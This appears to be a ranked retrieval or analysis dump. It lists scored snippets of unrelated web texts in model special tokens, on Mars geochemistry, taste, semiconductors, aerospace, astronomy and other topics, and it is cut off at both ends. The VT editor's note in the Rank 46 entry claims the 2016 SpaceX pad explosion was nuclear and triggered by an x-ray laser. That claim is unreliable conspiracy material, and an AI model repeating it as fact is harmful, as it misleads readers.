of water, carbon dioxide, oxygen, and two forms of sulfur, sulfur dioxide, the oxidized form, and hydrogen sulfide, the reduced form. The high deuterium-to-hydrogen ratio in water in the Mars atmosphere is a signature of the lighter hydrogen more rapidly escaping to space over geological time. Credit: NASA/ JPL-Caltech/GSFC. + +The new data from the powder drilled from within a rock at Yellowknife Bay indicates that mineralogy, chemistry and abundant fresh water conditions that existed at the time would have supported the existence of prokaryotic organisms. + +Such microbes "do not use organics to metabolize, but rather process inorganic compounds for food and energy", said John Grotzinger of Caltech, project scientist for the Mars Science Laboratory. + +"There does need to be a source of carbon there somewhere," Grotzinger said. "But if it is just carbon dioxide you can have a "Chemolitho autotrophic organism" that literally feeds on rocks. Such organisms will metabolize and generate organic compounds based on carbon in the carbon dioxide," the project scientist said at a Washington briefing on sample results. + +Curiosity's SAM instrument detected the simple carbon-containing compounds chloro- and dichloromethane from the powdered rock sample extracted from the "John Klein" rock on Mars. These species were detected by the gas chromatograph mass spectrometer (GCMS) on Curiosity's Sample Analysis at Mars instrument. The blue peak on the left shows the presence of chloromethane and the two red peaks on the right show the presence of dichloromethane. Credit: NASA/ JPL-Caltech/GSFC + +"The fact that Principal Investigator Paul Mahaffy was able to show in the Sample Analysis at Mars instrument that +================================================================================ +Rank = 46; Score = 987136.0 +<|begin_of_text|>[Editor’s note: Back in September, when the Space-X rocket blew up on the pad in Florida, taking the Israeli satellite it was carrying with it, VT was immediately on the ball in reporting what had actually happened, thanks to the expertise we can call on. VT’s Jeff Smith correctly identified the explosion as a nuclear one, not least because of the plainly visible plasma ball. + +A little research into the rocket design and it became clear that the helium contained in the rocket had exploded due to the Hohlraum effect that takes place when a container of helium, hydrogen or similar gas undergoes bombardment by radiation, in that case, most likely high intensity x-rays from a new x-ray laser just reaching deployment after having begun development in the 1980s as part of the infamous SDI ‘Star Wars’ programme. + +Space-X have now completed their investigation and have revealed that it was indeed the helium tanks that went boom, providing confirmation that VT had been correct in it’s evaluation of the incident. As Jeff commented: + +Well it was a helium tank rupture that did it so we were correct on that one; but liquid oxygen and helium don’t burn or turn into hot plasma by themselves. So they left out the ignition source data in the report. Interesting we got a 75% correct conformation. + +Ian] + +__________ + +Times of Israel + +SpaceX finds cause of explosion that destroyed Israeli satellite + +Elon Musk’s SpaceX company announced Monday that it had found the cause of a September launch pad explosion that destroyed a $300 million Israeli communications satellite. + +The company’s Falcon rockets have been grounded since the September 1 explosion. SpaceX said in a statement that it expects to return to flight on January 8. + +The statement posted on the SpaceX website on said the explosion was caused by the failure of one of three helium tanks, known as composite overwrapped pressure vessels or COPVs, inside the liquid oxygen tank in the rocket’s second stage. The loose liquid oxygen triggered a fuel explosion. + +The investigation was overseen by the Federal Aviation Administration, the US Air Force, the National Aeronautics and Space Administration, and the National Transportation Safety Board. + +The unmanned SpaceX Falcon 9 rocket was in the midst of a routine fueling test for its scheduled launch when it exploded. The explosion was felt throughout NASA’s Cape Canaveral, Florida facility and for several miles around. + +The rocket was scheduled to hoist into orbit the Amos 6 satellite, built by Israel Aerospace Industries and owned by Spacecom Ltd. in partnership with Eut +================================================================================ +Rank = 47; Score = 966656.0 +<|begin_of_text|>The gustatory system creates the human sense of taste, allowing us to perceive different flavors from substances that we consume as food and drink. Gustation, along with olfaction (the sense of smell), is classified as chemoreception. Because it functions by reacting with molecular chemical compounds in a given substance. Specialized cells in the gustatory system that are located on the tongue are called taste buds, and they sense tastants (taste molecules). The taste buds send the information after coming in contact with food from the tastants to the brain, where a molecule is processed as a certain taste. There are five main tastes: bitter, salty, sweet, sour, and umami (savory). All the varieties of flavor we experience are a combination of some or all of these tastes. + +The sense of taste is transduced by taste buds. Which are clusters of 50-100 taste receptor cells located in the tongue, soft palate, epiglottis, pharynx, and esophagus. The tongue is the main sensory organ of the gustatory system. The tongue contains papillae, or specialized epithelial cells, which have taste buds on their surface. There are three types of papillae with taste buds in the human gustatory system: + +Loading... + +fungiform papillae, which are mushroom-shaped and located at the tip of the tongue; + +foliate papillae, which are ridges and grooves toward the back of the tongue; + +circumvallate papillae, which are circular-shaped and located in a row just in front of the end of the tongue. + +You can’t taste food unless it’s mixed with your saliva + +Each taste bud is flask-like in shape and formed by two types of cells: supporting cells and gustatory cells. Gustatory cells are short-lived and are continuously regenerating. They each contain a taste pore at the surface of the tongue which is the site of sensory transduction. Though there are small differences in sensation, all taste buds, no matter their location, can respond to all types of taste.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 48; Score = 937984.0 +<|begin_of_text|>Ben Mills + +Researchers dream of making miniature, flexible electronic circuits from films just a few atoms thick. But growing such 2D films at the scale needed to produce batches of reliable electronic devices has been a challenge. + +Nature podcast Reporter Lizzie Gibney finds a class of materials with exotic properties – but can they one day rival silicon? You may need a more recent browser or to install the latest version of the Adobe Flash Plugin. + +Now materials scientists have devised a way to grow single layers of a promising class of 2D semiconductor on silicon wafers that are 10 centimetres across — all the while maintaining the impressive electronic properties seen in smaller samples1. They used the films to make hundreds of transistors, which tests showed worked in 99% of cases. + +“Lots of people are trying to grow single layers on this large scale, myself among them,” says Georg Duesberg, a materials scientist at Trinity College Dublin. “But it looks like these guys have really done it.” + +The semiconductors in question are known as transition-metal dichalcogenides (TMDs). A single-layer TMD is three atoms thick: it comprises a sheet of atoms from a family of elements called transition metals (which include molybdenum and tungsten) sandwiched between two layers of chalcogen atoms (such as sulfur, selenium and tellurium). + +Like their carbon-based cousin graphene, TMD sheets are strong, thin and flexible and conduct electrons. But unlike graphene, they are also semiconductors — meaning that the flow of electrons can be easily switched off and on. TMDs are unlikely ever to replace the most famous semiconductor, silicon, whose manufacture has been honed over decades. But they could form films more than a thousand times thinner than today's components made from silicon slabs, allowing for flexible transistors, displays, and light detectors. + +Large layers + +TMD layers can be peeled from a multi-layered crystal, much as graphene can be pulled from graphite with sticky tape. But the results can be inconsistent and the process is time consuming. An alternative — growing the material atom by atom from a gas of precursor chemicals — has so far produced only small-area samples that are often more than one layer thick. + +Publishing in Nature1 on 29 April, Jiwoong Park at Cornell University in Ithaca, New York, and his colleagues have adapted this technique to grow large single-layer films. Over 26 hours and at a temperature of 550 °C, +================================================================================ +Rank = 49; Score = 933888.0 +<|begin_of_text|>Image copyright Airbus Image caption Data gathered in the drop test is fed back into the design process + +Airbus has released pictures of the recent "drop test" it conducted for its spaceplane concept. + +The one-quarter-scale demonstrator was released from a height of 3,000m to learn more about how a real vehicle might behave as it returned to Earth. + +The Airbus project has been on a slow burn since being announced in 2007. + +If it were ever to go into production, the plane would be aimed at the tourism market, to take passengers on short hops above the atmosphere. + +The drop test took place in May, just off the coast of Singapore and was supported by the Singapore Economic Development Board. + +It involved a helicopter lifting the model off a barge and then carrying it aloft. + +On release, the demonstrator descended under the control of a remote pilot based back on the support vessel. + +Ships recovered the model after it ditched in the ocean. + +Engineers need to understand how a real vehicle will handle through all its flight phases. The Singapore experiment informs them about the late stages of a mission. + +That data can then be fed back into the computer models used to further the design process. + +Image copyright Airbus Image caption The model was controlled remotely from the support barge + +Airbus announced its spaceplane project with great fanfare in the June of 2007, but then had to scale back its vision when the global financial crisis took hold. + +But the company's Defence and Space division has never given up on the idea, and development work has continued on various aspects of the concept ever since, including on the rocket engine that would take the craft to sub-orbital altitudes. + +This would burn a mix of methane and oxygen. + +Unlike the much-talked-about Virgin spaceplane, the Airbus counterpart would take off from a standard runway using off-the-shelf turbofan jets. In many ways, it would resemble an executive jet. + +Only when the vehicle reached its "launch" altitude would it ignite the methane-oxygen rocket to complete the ascent to over 100km. + +The Virgin approach, in contrast, will use a carrier jet to lift a rocket plane to the launch altitude. + +Airbus Defence and Space programme manager Christophe Chavagnac told BBC News: "We have now reached a point where the advanced project is completed - that is, the basic requirements are there. + +"Now, we are preparing to shift to the next pre-development phase, and we're currently concentrating on a set of technology demonstrations for the sake of not +================================================================================ +Rank = 50; Score = 929792.0 +<|begin_of_text|>As we know from our history books, the War for Independence began with the shots fired at Lexington and Concord. Those shots required gunpowder, a substance that was in short supply throughout the colonies. In 1775 there was only one American gunpowder mill, the Frankford Mill in Pennsylvania, and it was turning out a miniscule amount compared to what would be needed to wage a successful war.[1] In addition, this mill was not turning out the high-quality powder needed for artillery use. If the Patriots were going to have any chance of victory, the colonies needed to step up production or import it. Had it not been for the French assistance in supplying the Americans with gunpowder from 1776 throughout the war, American forces would not have been able to fight and win the battles that they did. + +Gunpowder is a mixture of sulfur, charcoal, and potassium nitrate that must be combined in specific ratios. While this sounds simple enough, it must be remembered that in 1775 the state of chemistry was rudimentary. Potassium nitrate itself is a compound of nitrogen and potassium, neither element of which had been identified at that point in time.[2] What they did know was that what they called “nitre” was needed, which, in some recipes, involved soaking soil in urine from both animals and humans, and then allowing it to dry. The dried urine-soil was then boiled to produce saltpeter. Not all recipes agreed with this method which added to the problems in making gunpowder. Unfortunately this required half a year or more to produce nitre-bearing soil and created a bottleneck in the production of gunpowder in America. + +When the War for Independence started American supplies of powder were what they had gathered from Royal sources or their own local supplies. The amount was not enough to sustain an army in the field. While Congress was hopeful that they could establish enough mills to create their own self-sustaining sources of gunpowder, they also decided to seek additional supplies from overseas which meant European suppliers. The Journals of the Continental Congress are full of references to purchasing gunpowder in the West Indies. To do so meant selling American goods which involved adjusting the rules under the Association agreement of 1774. As several congressional delegates noted, gunpowder was needed or else the whole enterprise was lost. A Secret Committee was set up on September 19, 1775 to contract and agree to importation of gunpowder not to exceed 500 tons.[3] +================================================================================ +Rank = 51; Score = 925696.0 +<|begin_of_text|>Sunset in Mordor + +Don’t be fooled by the title; the mysterious, almost mystical bright light emerging from these thick, ominous clouds is actually a telltale sign of forming stars. + +Here, a very young star is being born in the guts of the dark cloud LDN 43 – a massive blob of gas, dust and ices, gathered 520 light-years from Earth in the constellation of Ophiuchus, The Serpent Bearer. + +Stars are born from cosmic dust and gas, which float freely in space until gravity forces it to bind together. The newborn star, RNO 91, is hidden in this image, revealed only by light reflected onto the plumes of the dark cloud. It is what astronomers call a pre-main sequence star, meaning that it has not yet started burning hydrogen in its core. + +The energy that allows RNO 91 to shine comes from gravitational contraction – the star is being compressed by its own weight. Once a critical mass is reached, hydrogen, its main component, will begin to fuse together, releasing huge amounts of energy in the process. This will mark the beginning of adulthood for the star. + +But even before this happens the adolescent star is bright enough to shine and generate powerful stellar winds, emitting intense X-ray and radio emission. + +RNO 91 is a variable star around half the mass of the Sun. Astronomers have already seen a dusty, icy disc surrounding it, stretching out to over 1700 times the distance from Earth to the Sun. It is believed that this disc may host planet embryos, and that it will eventually evolve into a fully-fledged planetary system. + +This image is based on data gathered by the NASA/ESA Hubble Space Telescope. A version of this image was entered into the Hubble’s Hidden Treasures image processing competition by contestant Judy Schmidt<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 52; Score = 917504.0 +<|begin_of_text|>22nd March 2013 + +A step closer to affordable water desalination + +The defence contractor, Lockheed Martin, has reported a new method for desalination that is vastly cheaper and more efficient, using nanotechnology. + +Lockheed Martin has been awarded a patent for "Perforene" – a new molecular filtration system that is designed to meet the growing global demand for potable water. This material works by removing sodium, chlorine and other ions from seawater and other sources. + +Dr. Ray Johnson, senior vice president and chief technology officer: "Access to clean drinking water is going to become more critical as the global population continues to grow, and we believe that this simple and affordable solution will be a game-changer for the industry. Perforene... is just one example of Lockheed Martin's efforts to apply some of the advanced materials that we have developed for our core markets, including aircraft and spacecraft, to global environmental and economic challenges." + +According to a UN report last year, over 780 million people around the world do not have access to clean drinking water. Tom Notaro, Lockheed business manager for advanced materials: "One of the areas that we're very concerned about in terms of global security is the access to clean and affordable drinking water. As more and more countries become more developed... access to that water for their daily lives is becoming more and more critical." + +Perforene was developed by placing holes that are one nanometre or less in a membrane of graphene. These are small enough to trap ions while dramatically improving the flow-through of water molecules, reducing clogging and pressure. Being just one atom thick, graphene is both strong and durable, making it far more effective at sea water desalination at a fraction of the cost of traditional reverse osmosis systems. + +John Stetson, senior engineer: "It's 500 times thinner than the best filter on the market today and 1,000 times stronger. The energy that's required and the pressure that's required to filter salt is approximately 100 times less." + +In addition to desalination, the Perforene membrane can be tailored to other applications – including capturing minerals, through the selection of the size of hole placed in the material to filter or capture a specific size particle of interest. Lockheed Martin has also been developing processes that will allow the material to be produced at scale. The company is now seeking commercialisation partners. + +A desalination plant in Dubai, United Arab Emirates + +Comments »<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 53; Score = 917504.0 +<|begin_of_text|>Press Release + +Blue Light Observations Indicate Water-Rich Atmosphere of a Super-Earth + +September 3, 2013 + +A Japanese research team of astronomers and planetary scientists has used Subaru Telescope's two optical cameras, Suprime-Cam and the Faint Object Camera and Spectrograph (FOCAS), with a blue transmission filter to observe planetary transits of super-Earth GJ 1214 b (Gilese 1214 b) (Figure 1). The team investigated whether this planet has an atmosphere rich in water or hydrogen. The Subaru observations show that the sky of this planet does not show a strong Rayleigh scattering feature, which a cloudless hydrogen-dominated atmosphere would predict. When combined with the findings of previous observations in other colors, this new observational result implies that GJ 1214 b is likely to have a water-rich atmosphere. + +Figure 1: Artist's rendition of a transit of GJ 1214 b in blue light. The blue sphere represents the host star GJ 1214, and the black ball in front of it on the right is GJ 1214 b. (Credit: NAOJ) + +Super-Earths are emerging as a new type of exoplanet (i.e., a planet orbiting a star outside of our Solar System) with a mass and radius larger than the Earth's but less than those of ice giants in our Solar System, such as Uranus or Neptune. Whether super-Earths are more like a "large Earth" or a "small Uranus" is unknown, since scientists have yet to determine their detailed properties. The current Japanese research team of astronomers and planetary scientists focused their efforts on investigating the atmospheric features of one super-Earth, GJ 1214 b, which is located 40 light years from Earth in the constellation Ophiuchus, northwest of the center of our Milky Way galaxy. This planet is one of the well-known super-Earths discovered by Charbonneau et. al. (2009) in the MEarth Project, which focuses on finding habitable planets around nearby small stars. The current team's research examined features of light scattering of GJ 1214 b's transit around its star. + +Current theory posits that a planet develops in a disk of dense gas surrounding a newly formed star (i.e., a protoplanetary disk). The element hydrogen is a major component of a protoplanetary disk, and water ice is abundant in an outer region beyond a so-called "snow +================================================================================ +Rank = 54; Score = 913408.0 +<|begin_of_text|>This article is about air conditioning. For similar concept in atomic physics, see Evaporative cooling (atomic physics) + +An evaporative cooler (also swamp cooler, swamp box, desert cooler and wet air cooler) is a device that cools air through the evaporation of water. Evaporative cooling differs from typical air conditioning systems, which use vapor-compression or absorption refrigeration cycles. Evaporative cooling uses the fact that water will absorb a relatively large amount of heat in order to evaporate (that is, it has a large enthalpy of vaporization). The temperature of dry air can be dropped significantly through the phase transition of liquid water to water vapor (evaporation). This can cool air using much less energy than refrigeration. In extremely dry climates, evaporative cooling of air has the added benefit of conditioning the air with more moisture for the comfort of building occupants. + +The cooling potential for evaporative cooling is dependent on the wet-bulb depression, the difference between dry-bulb temperature and wet-bulb temperature (see relative humidity). In arid climates, evaporative cooling can reduce energy consumption and total equipment for conditioning as an alternative to compressor-based cooling. In climates not considered arid, indirect evaporative cooling can still take advantage of the evaporative cooling process without increasing humidity. Passive evaporative cooling strategies can offer the same benefits of mechanical evaporative cooling systems without the complexity of equipment and ductwork. + +Overview [ edit ] + +qanat, used for evaporative cooling of buildings Schematic diagram of an ancient Iranian windcatcher and, used for evaporative cooling of buildings + +An earlier form of evaporative cooling, the windcatcher, was first used in ancient Egypt and Persia thousands of years ago in the form of wind shafts on the roof. They caught the wind, passed it over subterranean water in a qanat and discharged the cooled air into the building. Modern Iranians have widely adopted powered evaporative coolers (coolere âbi).[1] + +The evaporative cooler was the subject of numerous US patents in the 20th century; many of these, starting in 1906,[2] suggested or assumed the use of excelsior (wood wool) pads as the elements to bring a large volume of water in contact with moving air to allow evaporation to occur. A typical design, as shown in a 1945 patent, includes a water reservoir (usually with level controlled by a float valve), a pump to circulate water over the excelsior pads and +================================================================================ +Rank = 55; Score = 897024.0 +<|begin_of_text|>The microsomal ethanol oxidizing system (MEOS) is an alternate pathway of ethanol metabolism that occurs in the smooth endoplasmic reticulum in the oxidation of ethanol to acetaldehyde. While playing only a minor role in ethanol metabolism in average individuals, MEOS activity increases after chronic alcohol consumption. The MEOS pathway requires the CYP2E1 enzyme, part of the cytochrome P450 family of enzymes, to convert ethanol to acetaldehyde. Ethanol’s affinity for CYP2E1 is lower than its affinity for alcohol dehydrogenase. It has delayed activity in non-chronic alcohol consumption states as increase in MEOS activity is correlated with an increase in production of CYP2E1, seen most conclusively in alcohol dehydrogenase negative deer mice.[1] + +The MEOS pathway converts ethanol to acetaldehyde by way of a redox reaction. In this reaction, ethanol is oxidized (losing two hydrogens) and O 2 is reduced (by accepting hydrogen) to form H 2 O. NADPH is used as donor of hydrogen, forming NADP+.[2] This process consumes ATP and dissipates heat, thus leading to the hypothesis that long term drinkers see an increase in resting energy expenditure.[3] + +The increase in rest energy expenditure has, according to some studies, been explained by indicating that the MEOS "expends" nine calories per gram of ethanol to metabolize versus 7 calories per gram of ethanol ingested. This results in a net loss of 2 calories per gram of ethanol ingested. + +References [ edit ]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 56; Score = 884736.0 +<|begin_of_text|>Dec 18, 2015 | By Alec + +Over the past few years aerospace 3D printing has really been taking off, and especially NASA is seeming to use this technology in just about every aspect of their Mission to Mars – from prototyping, to in-space parts manufacturing and even to manufacturing actual engine parts to send spacecraft into space. And they seem to be particularly successful in that latter goal, as they have just tested a completely 3D printed rocket engine. During the successful tests, the engine used cryogenic liquid hydrogen and oxygen to produce 20,000 pounds of thrust. + +It thus seems that the future of 3D printing in space exploration is ensured. NASA has previously extensively discussed the advantages of the technology, especially as a cost-saving tool for lengthy exploration missions. That does require, however, a technology capable of producing vital spacecraft parts and that is what these tests are all about. NASA previously tested a 3D printed turbopump for rocket propulsion, at the same test facility at their Marshall Space Flight Center in Huntsville, Alabama. + +However, this new test is particularly interesting because of the amount of 3D printed parts involved. “We manufactured and then tested about 75 percent of the parts needed to build a 3D printed rocket engine,” said Elizabeth Robertson, the project manager for the additively manufactured demonstrator engine said on the NASA website. “By testing the turbopumps, injectors and valves together, we’ve shown that it would be possible to build a 3-D printed engine for multiple purposes such as landers, in-space propulsion or rocket engine upper stages.” + +This engine is part of a greater program for the development of 3D printed parts, which has been ongoing for the past three years. While most have been tested individually or as part of greater non-3D printed setups, this test involved lots of 3D printed parts operating together – as they would in a typical engine. “In engineering lingo, this is called a breadboard engine,” explained Nick Case, the testing lead at the project. “What matters is that the parts work the same way as they do in a conventional engine and perform under the extreme temperatures and pressures found inside a rocket engine. The turbopump got its “heartbeat” racing at more than 90,000 revolutions per minute (rpm) and the end result is the flame you see coming out of the thrust chamber to produce over 20,000 pounds of thrust, and an engine like this could produce enough power for an +================================================================================ +Rank = 57; Score = 880640.0 +<|begin_of_text|>I’m about to be introduced to Benedict Cumberbatch when some autograph hunters intervene. He cheerfully obliges, even when one signature becomes a dozen. “And could you sign this one for my sister?” becomes something of a theme. + +He records a personal greeting for two schoolgirls embarking on their first play. And another one. And another one. + +If I hadn’t known before that the star of Sherlock and Star Trek: Into Darkness was the most popular man in Britain, I’d know it now. + +He finally bids his fan club farewell: “Not at all,” he tells them. “One of the perks of the job.” + +He bounds over and reaches for a giant dark chocolate Toblerone. “I am sorry,” he tells me with a firm handshake. “But I do need sugar.” He politely pushes the big triangle into the side of his mouth so that he can keep talking. The effect is to sharpen his already razor-like cheekbones. “I wish there was a more decorous way of doing this,” he smiles. + +I can’t think of one. This is exactly how I would expect a Mitford sister to eat polyhedral- shaped confectionary if they had lately been accosted by Cumberbitches. But the 38-year-old can’t find cause to complain. + +“You have to pinch yourself,” he says cheerfully. “To have a professional life where you get to tell stories and people respond? It’s kind of wonderful. Magic, actually.” + +Not that Cumberbatch is impressed by celebrity. Even his own. BBC’s Sherlock has catapulted him to the top of Sexiest Man Alive and Britain’s Greatest Thespian polls. But such things are of little consequence to Benedict Timothy Carlton Cumberbatch. + +“However lost in showbiz someone can get, I’ve never met anyone who really believes that that’s all there is,” he says. “Can you imagine what a dead end that would be artistically? How could you feed your head like that?” + +The thinker + +Benedict Cumberbatch is a thinker. He practises mindfulness and meditation. After Harrow, he spent his gap year reading The Tao of Physics while teaching English in a Tibetan Buddhist monastery in Darjeeling. Between gigs he likes to draw and stare at the moon. + +“I like to think that our atoms are made of stardust,” he muses. “I like to think that we’re revolving on this planet and revolving through the galaxy. I love having context that’s so much +================================================================================ +Rank = 58; Score = 880640.0 +<|begin_of_text|>Several fundamental ideas in calculus are more than 2000 years old. As a formal subdiscipline of mathematics, calculus was first introduced and developed in the late 1600s, with key independent contributions from Sir Isaac Newton and Gottfried Wilhelm Leibniz. Mathematicians agree that the subject has been understood rigorously since the work of Augustin Louis Cauchy and Karl Weierstrass in the mid 1800s when the field of modern analysis was developed, in part to make sense of the infinitely small quantities on which calculus rests. Hence, as a body of knowledge calculus has been completely understood by experts for at least 150 years. The discipline is one of our great human intellectual achievements: among many spectacular ideas, calculus models how objects fall under the forces of gravity and wind resistance, explains how to compute areas and volumes of interesting shapes, enables us to work rigorously with infinitely small and infinitely large quantities, and connects the varying rates at which quantities change to the total change in the quantities themselves.While each author of a calculus textbook certainly offers her own creative perspective on the subject, it is hardly the case that many of the ideas she presents are new. Indeed, the mathematics community broadly agrees on what the main ideas of calculus are, as well as their justification and their importance; the core parts of nearly all calculus textbooks are very similar. As such, it is our opinion that in the 21st century – an age where the internet permits seamless and immediate transmission of information – no one should be required to purchase a calculus text to read, to use for a class, or to find a coherent collection of problems to solve. Calculus belongs to humankind, not any individual author or publishing company. Thus, the main purpose of this work is to present a new calculus text that is free. In addition, instructors who are looking for a calculus text should have the opportunity to download the source files and make modifications that they see fit; thus this text is open-source. Since August 2013, Active Calculus has been endorsed by the American Institute of Mathematics and its Open Textbook Initiative<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 59; Score = 